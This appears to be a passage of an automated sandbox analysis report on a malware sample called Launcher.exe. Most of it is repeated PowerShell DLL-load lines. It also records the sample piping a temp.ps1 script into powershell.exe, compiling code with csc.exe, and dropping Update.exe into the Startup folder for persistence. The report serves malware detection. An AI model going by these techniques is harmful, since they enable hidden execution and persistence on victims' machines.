        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\tasklist.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Launcher.exe Static PE information: More than 8191 > 100 exports found
        Source: Launcher.exe Static PE information: Virtual size of .text is bigger than: 0x100000
        Source: Launcher.exe Static PE information: Image base 0x140000000 > 0x60000000
        Source: Launcher.exe Static file information: File size 59619367 > 1048576
        Source: Launcher.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12aa000
        Source: Launcher.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xfe5c00
        Source: Launcher.exe Static PE information: More than 200 imports for KERNEL32.dll
        Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: Launcher.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: D:\a\dpapi\dpapi\build\Release\dpapi.pdb source: Launcher.exe, 00000000.00000003.1498567944.0000017526712000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1515067184.0000017526090000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\node-sqlite3\node-sqlite3\build\Release\node_sqlite3.pdb source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1338150455.000001752651D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp
        Source: Launcher.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: Launcher.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: Launcher.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: Launcher.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: Launcher.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline"
        Source: Launcher.exe Static PE information: section name: _RDATA
        Source: Update.exe.0.dr Static PE information: section name: _RDATA
        Source: b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442.0.dr Static PE information: section name: _RDATA
        Source: node_sqlite3.node.0.dr Static PE information: section name: _RDATA
        Source: node_sqlite3.node.bak.0.dr Static PE information: section name: _RDATA
        Source: 59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041.0.dr Static PE information: section name: _RDATA
        Source: node.napi.node.0.dr Static PE information: section name: _RDATA
        Source: node.napi.node.bak.0.dr Static PE information: section name: _RDATA
        Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node.bak
        Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node.bak
        Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg-RIXWqQ\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041
        Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe
        Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg-RIXWqQ\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442
        Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.dll
        Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node

        Boot Survival

        Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe
        Source: C:\Users\user\Desktop\Launcher.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe\:Zone.Identifier:$DATA
        Source: C:\Users\user\Desktop\Launcher.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
